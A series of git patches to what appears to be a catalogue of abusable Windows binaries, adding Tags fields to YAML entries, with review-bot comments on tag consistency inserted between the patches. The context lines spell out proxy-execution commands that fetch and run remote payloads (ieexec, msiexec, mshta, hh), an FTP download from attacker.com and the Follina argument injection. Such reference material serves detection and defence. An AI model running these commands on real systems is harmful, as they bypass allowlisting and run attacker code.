C:\Windows\SysWOW64\gpscript.exe From bbe0681a9a02b52f423c4d8dd568c901c59d8704 Mon Sep 17 00:00:00 2001 
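Review bot: Only the first Ftp entry gains `Tags:`; the `cmd.exe /c "@echo open attacker.com 21>ftp.txt ... @ftp -s:ftp.txt -v"` entry that follows in the hunk gets none, and the diffstat (`3 +++`) confirms no other insertions in the file. Since that entry's description is `Download`, add `Tags:` with `- Input: Custom Format` and, following the convention the rest of this series applies to URL/host-sourced payloads, `- Execute: Remote` only if the entry is considered execution rather than pure download.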
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:24:23 +0200 Subject: [PATCH 025/148] Update Hh.yml Tags and Added command Added the command to execute remote CHM files Added Tags --- yml/OSBinaries/Hh.yml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index f6db4701..9d96358c 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -18,6 +18,20 @@ Commands: Privileges: User MitreID: T1218.001 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: EXE + - Input: Custom Format + - Command: HH.exe http://some.url/payload.chm + Description: Executes a remote payload.chm file which can contain commands. + Usecase: Execute commands with HH.exe + Category: Execute + Privileges: User + MitreID: T1218.001 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: CMD + - Execute: CHM + - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe - Path: C:\Windows\SysWOW64\hh.exe From 0a8785481dbb9d10211e19200443d4c17ca0c6af Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:26:30 +0200 Subject: [PATCH 026/148] Update Ie4uinit.yml Added Tags: Execute INF Input: Fixed Format --- yml/OSBinaries/Ie4uinit.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml index 461fbca2..ae5dd4a9 100644 --- a/yml/OSBinaries/Ie4uinit.yml +++ b/yml/OSBinaries/Ie4uinit.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF + - Input: Fixed Format Full_Path: - Path: c:\windows\system32\ie4uinit.exe - Path: c:\windows\sysWOW64\ie4uinit.exe From 5210291b3cbe9f01e58f21f30e794f4ccf43a157 Mon Sep 17 00:00:00 2001 
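Review bot: The new `HH.exe http://some.url/payload.chm` entry is tagged both `Execute: CMD` and `Execute: CHM`, which mixes the artifact HH.exe consumes (the CHM) with what the CHM's embedded script then does; the Cmstp entry in this same series, whose INF runs an SCT via scrobj.dll, is tagged only `Execute: INF`. For a consistent facet, keep `- Execute: CHM`, drop `- Execute: CMD`, and add `- Execute: Remote` since the payload is fetched from a URL. The existing entry above it that receives `Execute: EXE` has its command line outside this hunk, so I cannot confirm that tag.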
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:29:36 +0200 Subject: [PATCH 027/148] Update Iediagcmd.yml Tags Added Tags Execute EXE Input Fixed Format --- yml/OSBinaries/Iediagcmd.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Iediagcmd.yml b/yml/OSBinaries/Iediagcmd.yml index b1d47d4b..9d5ddcc6 100644 --- a/yml/OSBinaries/Iediagcmd.yml +++ b/yml/OSBinaries/Iediagcmd.yml @@ -11,6 +11,9 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 + Tags: + - Execute: EXE + - Input: Fixed Format Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: From e8c0c77d7939d93e0058e71cbebfbcacc5fd20c4 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:31:56 +0200 Subject: [PATCH 028/148] Update Ieexec.yml Tags Added Tags: Execute .NetEXE Execute Remote Input Custom Format --- yml/OSBinaries/Ieexec.yml | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml index 0987d2b1..43ba954d 100644 --- a/yml/OSBinaries/Ieexec.yml +++ b/yml/OSBinaries/Ieexec.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: .NetEXE + - Input: Custom Format - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe Description: Downloads and executes bypass.exe from the remote server. Usecase: Download and run attacker code from remote location @@ -18,6 +22,10 @@ Commands: Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + Tags: + - Execute: Remote + - Execute: .NetEXE + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe 
From f3739fade33986c891a14df1b616c747992973e8 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:33:39 +0200 Subject: [PATCH 029/148] Update Infdefaultinstall.yml Tags Added: Execute INF Input Custom Format --- yml/OSBinaries/Infdefaultinstall.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Infdefaultinstall.yml b/yml/OSBinaries/Infdefaultinstall.yml index 4c866881..9d8c607c 100644 --- a/yml/OSBinaries/Infdefaultinstall.yml +++ b/yml/OSBinaries/Infdefaultinstall.yml @@ -11,6 +11,9 @@ Commands: Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + Tags: + - Execute: INF + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe From bb2ab8ccda07682f2f86e5f458c90db327201294 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:36:26 +0200 Subject: [PATCH 030/148] Update Mavinject.yml Tags Added Tags: Input Custom Format --- yml/OSBinaries/Mavinject.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yml/OSBinaries/Mavinject.yml b/yml/OSBinaries/Mavinject.yml index 33e2aa7c..f89afc01 100644 --- a/yml/OSBinaries/Mavinject.yml +++ b/yml/OSBinaries/Mavinject.yml @@ -13,6 +13,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 Usecase: Inject dll file into running process 
@@ -22,6 +23,7 @@ Commands: OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL + - Input: Custom Format Full_Path: - Path: C:\Windows\System32\mavinject.exe - Path: C:\Windows\SysWOW64\mavinject.exe From 699d8e980913e66efdcfff44f9863e351486ed66 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 13:39:18 +0200 Subject: [PATCH 031/148] Update Microsoft.Workflow.Compiler.yml Tags Added Tags: Execute VB.Net Execute C# Input Custom Format --- yml/OSBinaries/Microsoft.Workflow.Compiler.yml | 12 ++++++++++++ 1 file changed, 12 insertions(+) diff --git a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml index c26c0c2e..a711f8e6 100644 --- a/yml/OSBinaries/Microsoft.Workflow.Compiler.yml +++ b/yml/OSBinaries/Microsoft.Workflow.Compiler.yml @@ -11,6 +11,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -18,6 +22,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file. Usecase: Compile and run code @@ -25,6 +33,10 @@ Commands: Privileges: User MitreID: T1127 OperatingSystem: Windows 10S, Windows 11 + Tags: + - Execute: VB.Net + - Execute: Csharp + - Input: Custom Format Full_Path: - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe Code_Sample: From 75cd5751021ad372a38f4f1808d0daa76119b10a Mon Sep 17 00:00:00 2001 
From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 14:50:16 +0200 Subject: [PATCH 032/148] Category Bugfix --- yml/OSBinaries/Control.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Control.yml b/yml/OSBinaries/Control.yml index 4ebd8813..a9b8c99d 100644 --- a/yml/OSBinaries/Control.yml +++ b/yml/OSBinaries/Control.yml @@ -17,7 +17,7 @@ Commands: - Command: control.exe c:\windows\tasks\evil.cpl Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) Usecase: Use to execute code and bypass application whitelisting - Category: Execution + Category: Execute Privileges: User MitreID: T1218.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 From 504c922eb933151a1a3647bbdc2122cf2933c3a1 Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:10:17 +0200 Subject: [PATCH 033/148] Update Hh.yml Tags Added execution remote tag --- yml/OSBinaries/Hh.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml index 9d96358c..bc55c986 100644 --- a/yml/OSBinaries/Hh.yml +++ b/yml/OSBinaries/Hh.yml @@ -31,6 +31,7 @@ Commands: Tags: - Execute: CMD - Execute: CHM + - Execute: Remote - Input: Custom Format Full_Path: - Path: C:\Windows\hh.exe From 377c4b40847147957af1fb34910efc5d93ac627d Mon Sep 17 00:00:00 2001 From: hegusung <7390383+hegusung@users.noreply.github.com> Date: Sun, 13 Oct 2024 15:18:35 +0200 Subject: [PATCH 034/148] Update Mmc.yml Tags Added tags Execute DLL Input Custom format --- yml/OSBinaries/Mmc.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yml/OSBinaries/Mmc.yml b/yml/OSBinaries/Mmc.yml index 7dfdb8d8..0eb4ee99 100644 --- a/yml/OSBinaries/Mmc.yml +++ b/yml/OSBinaries/Mmc.yml 
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218.014
 OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
+ Tags:
+ - Execute: DLL
+ - Input: Custom Format
 - Command: mmc.exe gpedit.msc
 Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
 Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
From eef914dc7b5515d25cb102eca68bac0af2a8fb6f Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 15:23:20 +0200
Subject: [PATCH 035/148] Update Msbuild.yml Tags Added Tags: - Execute : CSharp - Execute CMD - Input Custom Format
---
 yml/OSBinaries/Msbuild.yml | 11 +++++++++++
 1 file changed, 11 insertions(+)
diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml
index 62d95ffe..80a2fa57 100644
--- a/yml/OSBinaries/Msbuild.yml
+++ b/yml/OSBinaries/Msbuild.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1127.001
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: Csharp
+ - Input: Custom Format
 - Command: msbuild.exe project.csproj
 Description: Build and execute a C# project stored in the target csproj file.
 Usecase: Compile and run code
@@ -18,6 +21,9 @@ Commands:
 Privileges: User
 MitreID: T1127.001
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: Csharp
+ - Input: Custom Format
 - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
 Description: Executes generated Logger DLL file with TargetLogger export
 Usecase: Execute DLL
@@ -27,6 +33,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: DLL
+ - Input: Custom Format
 - Command: msbuild.exe project.proj
 Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
 Usecase: Execute project file that contains XslTransformation tag parameters
@@ -36,6 +43,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: WSH
+ - Input: Custom Format
 - Command: msbuild.exe @sample.rsp
 Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
 Usecase: Bypass command-line based detections
@@ -43,6 +51,9 @@ Commands:
 Privileges: User
 MitreID: T1036
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
+ - Input: Custom Format
 Full_Path:
 - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
 - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
From a88747c29096c22e7271131ba5b38173b8264e12 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 15:25:01 +0200
Subject: [PATCH 036/148] Update Msconfig.yml Tags Added Tags: - Execute CMD Input Custom Format
---
 yml/OSBinaries/Msconfig.yml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml
index 56b2a4fa..54ba0b5e 100644
--- a/yml/OSBinaries/Msconfig.yml
+++ b/yml/OSBinaries/Msconfig.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: Administrator
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Execute: CMD
+ - Input: Custom Format
 Full_Path:
 - Path: C:\Windows\System32\msconfig.exe
 Code_Sample:
From 9f3b237005da8adb01f4d676c0d90a9caf785b6e Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 15:49:14 +0200
Subject: [PATCH 037/148] Update Msdt.yml Tags Added Tags: Execute MSI Execute CMD Input Custom Format
---
 yml/OSBinaries/Msdt.yml | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml
index ed0a6019..1b9649eb 100644
--- a/yml/OSBinaries/Msdt.yml
+++ b/yml/OSBinaries/Msdt.yml
@@ -13,6 +13,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Application: GUI
+ - Execute: MSI
+ - Input: Custom Format
 - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
 Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
 Usecase: Execute code bypass Application whitelisting
@@ -22,6 +24,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Application: GUI
+ - Execute: MSI
+ - Input: Custom Format
 - Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
 Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
 Usecase: Execute code bypass Application allowlisting
@@ -31,6 +35,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Application: GUI
+ - Execute: CMD
+ - Input: Custom Format
 Full_Path:
 - Path: C:\Windows\System32\Msdt.exe
 - Path: C:\Windows\SysWOW64\Msdt.exe
From b8d98f067dbb2dd267c633bb44076d35066be715 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 15:54:08 +0200
Subject: [PATCH 038/148] Update Msedge.yml Tags Added Tags: Execute CMD Input Custom Format
---
 yml/OSBinaries/Msedge.yml | 3 +++
 1 file changed, 3 insertions(+)
diff --git a/yml/OSBinaries/Msedge.yml b/yml/OSBinaries/Msedge.yml
index 28443033..96d6f820 100644
--- a/yml/OSBinaries/Msedge.yml
+++ b/yml/OSBinaries/Msedge.yml
@@ -25,6 +25,9 @@ Commands:
 Privileges: User
 MitreID: T1218.015
 OperatingSystem: Windows 10, Windows 11
+ Tags:
+ - Execute: CMD
+ - Input: Custom Format
 Full_Path:
 - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
 - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
From bd07c4dd2433f1f6790ecc90fde6cdea64e2bfcd Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:03:39 +0200
Subject: [PATCH 039/148] Update Mshta.yml Tags Added Tags: Execute: Remote Input Custom Format Execute JScript Execute VBScript
---
 yml/OSBinaries/Mshta.yml | 6 ++++++
 1 file changed, 6 insertions(+)
diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml
index 8a3de9fe..a3d4fdea 100644
--- a/yml/OSBinaries/Mshta.yml
+++ b/yml/OSBinaries/Mshta.yml
@@ -13,6 +13,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: WSH
+ - Execute: Remote
+ - Input: Custom Format
 - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
 Description: Executes VBScript supplied as a command line argument.
 Usecase: Execute code
@@ -20,6 +22,8 @@ Commands:
 Privileges: User
 MitreID: T1218.005
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: VBScript
 - Command: mshta.exe javascript:a=GetObject("script:https://webserver/payload.sct").Exec();close();
 Description: Executes JavaScript supplied as a command line argument.
 Usecase: Execute code
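Review bot: The `Tags` block added at `@@ -20,6 +22,8 @@` gives the `mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))` entry only `- Execute: VBScript`, although that command fetches its scriptlet from an HTTPS URL; the first hunk in this same commit tags the preceding entry with `- Execute: Remote`, so the Remote tag is applied inconsistently within the file. The same gap is in the `@@ -27,6 +31,8 @@` hunk on the next line, where the `javascript:…GetObject("script:https://webserver/payload.sct")` entry gets only `- Execute: JScript`. Adding `- Execute: Remote` under both of these blocks would match how Hh, Regsvr32 and Msiexec are tagged elsewhere in this series.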
@@ -27,6 +31,8 @@ Commands:
 Privileges: User
 MitreID: T1218.005
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: JScript
 - Command: mshta.exe "C:\ads\file.txt:file.hta"
 Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
 Usecase: Execute code hidden in alternate data stream
From 090f8e207899bc6fea3a7c9c02d8c3a763393bdf Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:12:06 +0200
Subject: [PATCH 040/148] Update Msiexec.yml Tags Added Tags: Execute MSI Execute Remote Input Custom Format
---
 yml/OSBinaries/Msiexec.yml | 14 ++++++++++++++
 1 file changed, 14 insertions(+)
diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml
index 35a97e48..f58f0277 100644
--- a/yml/OSBinaries/Msiexec.yml
+++ b/yml/OSBinaries/Msiexec.yml
@@ -11,6 +11,9 @@ Commands:
 Privileges: User
 MitreID: T1218.007
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: MSI
+ - Input: Custom Format
 - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
 Description: Installs the target remote & renamed .MSI file silently.
 Usecase: Execute custom made msi file with attack code from remote server
@@ -18,6 +21,10 @@ Commands:
 Privileges: User
 MitreID: T1218.007
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: MSI
+ - Execute: Remote
+ - Input: Custom Format
 - Command: msiexec /y "C:\folder\evil.dll"
 Description: Calls DllRegisterServer to register the target DLL.
 Usecase: Execute dll files
@@ -27,6 +34,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: DLL
+ - Execute: Remote
+ - Input: Custom Format
 - Command: msiexec /z "C:\folder\evil.dll"
 Description: Calls DllUnregisterServer to un-register the target DLL.
 Usecase: Execute dll files
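Review bot: The `- Execute: Remote` line added at `@@ -27,6 +34,8 @@` lands in the `Tags` block of the `msiexec /y "C:\folder\evil.dll"` entry (the block precedes the next `- Command:` line), whose command and description refer to a local DLL path, so the tag does not describe that entry; the same mismatch is in the `@@ -36,6 +45,8 @@` hunk on the following line, whose block belongs to `msiexec /z "C:\folder\evil.dll"`. Unless a UNC or URL variant of `/y` and `/z` is intended, drop `- Execute: Remote` from those two blocks. Conversely, the block at `@@ -43,6 +54,9 @@` for the `msiexec /i "https://trustedURL/signed.msi" TRANSFORMS=…` entry receives `Remote` and `Input: Custom Format` but not `- Execute: MSI`, while the other `/i` entries in this commit do; adding `- Execute: MSI` there keeps the file self-consistent.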
@@ -36,6 +45,8 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Tags:
 - Execute: DLL
+ - Execute: Remote
+ - Input: Custom Format
 - Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
 Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.
 Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server
@@ -43,6 +54,9 @@ Commands:
 Privileges: User
 MitreID: T1218.007
 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: Remote
+ - Input: Custom Format
 Full_Path:
 - Path: C:\Windows\System32\msiexec.exe
 - Path: C:\Windows\SysWOW64\msiexec.exe
From 7783b436cb7691c220ed8f3de4414f7a2898f270 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:24:52 +0200
Subject: [PATCH 041/148] Update Pcalua.yml Tags Tags added: Execute CMD Execute DLL
---
 yml/OSBinaries/Pcalua.yml | 5 +++++
 1 file changed, 5 insertions(+)
diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml
index 8a8ee403..7162943a 100644
--- a/yml/OSBinaries/Pcalua.yml
+++ b/yml/OSBinaries/Pcalua.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: pcalua.exe -a \\server\payload.dll
 Description: Open the target .DLL file with the Program Compatibilty Assistant.
 Usecase: Proxy execution of remote dll file
@@ -20,6 +22,7 @@ Commands:
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Tags:
 - Execute: DLL
+ - Execute: Remote
 - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
 Description: Open the target .CPL file with the Program Compatibility Assistant.
 Usecase: Execution of CPL files
@@ -27,6 +30,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: DLL
 Full_Path:
 - Path: C:\Windows\System32\pcalua.exe
 Detection:
From 5a1370ca110fca7a6ea7c87f14490dc16395e441 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:26:26 +0200
Subject: [PATCH 042/148] Update Pcwrun.yml Tags Added Tags: Execute EXE
---
 yml/OSBinaries/Pcwrun.yml | 4 ++++
 1 file changed, 4 insertions(+)
diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml
index de15d070..cf36bb62 100644
--- a/yml/OSBinaries/Pcwrun.yml
+++ b/yml/OSBinaries/Pcwrun.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 - Command: Pcwrun.exe /../../$(calc).exe
 Description: Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
 Usecase: Proxy execution of binary
@@ -18,6 +20,8 @@ Commands:
 Privileges: User
 MitreID: T1202
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+ Tags:
+ - Execute: EXE
 Full_Path:
 - Path: C:\Windows\System32\pcwrun.exe
 Detection:
From 741e0877df3a53e97d56410679255a842617fffc Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:29:07 +0200
Subject: [PATCH 043/148] Update Pnputil.yml Tags Added Tags: Execute INF
---
 yml/OSBinaries/Pnputil.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Pnputil.yml b/yml/OSBinaries/Pnputil.yml
index 1da2ab6b..5c45cce0 100644
--- a/yml/OSBinaries/Pnputil.yml
+++ b/yml/OSBinaries/Pnputil.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1547
 OperatingSystem: Windows 7, Windows 10, Windows 11
+ Tags:
+ - Execute: INF
 Full_Path:
 - Path: C:\Windows\system32\pnputil.exe
 Code_Sample:
From 8d6bd28331389f8cc9819b334a7947b622a28bdc Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:34:45 +0200
Subject: [PATCH 044/148] Update Presentationhost.yml Tags Added Tags: Execute XBAP
---
 yml/OSBinaries/Presentationhost.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml
index 8a1b221d..a63a2a80 100644
--- a/yml/OSBinaries/Presentationhost.yml
+++ b/yml/OSBinaries/Presentationhost.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: User
 MitreID: T1218
 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
+ Tags:
+ - Execute: XBAP
 - Command: Presentationhost.exe https://example.com/payload
 Description: It will download a remote payload and place it in INetCache.
 Usecase: Downloads payload from remote server
From d1f6a8a3972000152726fdd16b5c50d685444171 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:36:45 +0200
Subject: [PATCH 045/148] Update Provlaunch.yml Tags Added Tags: Execute CMD
---
 yml/OSBinaries/Provlaunch.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/yml/OSBinaries/Provlaunch.yml b/yml/OSBinaries/Provlaunch.yml
index 0d29e27a..7f5b18b7 100644
--- a/yml/OSBinaries/Provlaunch.yml
+++ b/yml/OSBinaries/Provlaunch.yml
@@ -11,6 +11,8 @@ Commands:
 Privileges: Administrator
 MitreID: T1218
 OperatingSystem: Windows 10, Windows 11, Windows Server 2012, Windows Server 2016, Windows Server 2019, Windows Server 2022
+ Tags:
+ - Execute: CMD
 Full_Path:
 - Path: c:\windows\system32\provlaunch.exe
 Detection:
From 9aa4200dae25c703feaae3b7dc2974ca3afdb5a8 Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 16:41:32 +0200
Subject: [PATCH 046/148] Update Regasm.yml Tags Changed Tags DLL to .NetDLL
---
 yml/OSBinaries/Regasm.yml | 8 +++-----
 1 file changed, 3 insertions(+), 5 deletions(-)
